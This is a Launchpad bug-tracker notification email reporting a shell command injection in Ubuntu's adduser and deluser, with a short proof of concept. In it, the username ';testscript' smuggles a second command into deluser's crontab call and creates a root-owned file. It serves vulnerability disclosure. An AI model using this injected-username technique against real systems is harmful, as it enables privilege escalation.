Thanks! ** Also affects: adduser (Debian) via https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 Importance: Unknown Status: Unknown
** Changed in: adduser (Ubuntu) Status: Incomplete => Confirmed -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to adduser in Ubuntu. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection Status in adduser package in Ubuntu: Confirmed Status in adduser package in Debian: Unknown Bug description: deluser program is vulnerable to a command injection vulnerability when a user is added via adduser with special characters (such as ';'). It is only possible when the user exists on the system (adduser does not prevent usernames with ';' to be added.) This can be a security risk when user accounts on the system can be created from arbitrary input, and there are exploitable programs in PATH to make privilege escalation possible. -------------- Proof of concept ---------------- # ll /test-file ls: cannot access '/test-file': No such file or directory # cat /usr/bin/testscript #!/bin/bash touch /test-file # deluser Enter a user name to remove: ;testscript no crontab for root crontab: usage error: no arguments permitted after this option usage: crontab [-u user] file crontab [ -u user ] [ -i ] { -e | -l | -r } (default operation is replace, per 1003.2) -e (edit user's crontab) -l (list user's crontab) -r (delete user's crontab) -i (prompt before deleting user's crontab) /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code 1. Exiting. (failed reverse-i-search)`': deluser^C # ll /test-file -rw------- 1 root root 0 Jul 31 10:25 /test-file -------- system description -------- Description: Ubuntu 18.04.2 LTS Release: 18.04 # apt-cache policy adduser adduser: Installed: 3.116ubuntu1 Candidate: 3.116ubuntu1 Version table: *** 3.116ubuntu1 500 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages 100 /var/lib/dpkg/status To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp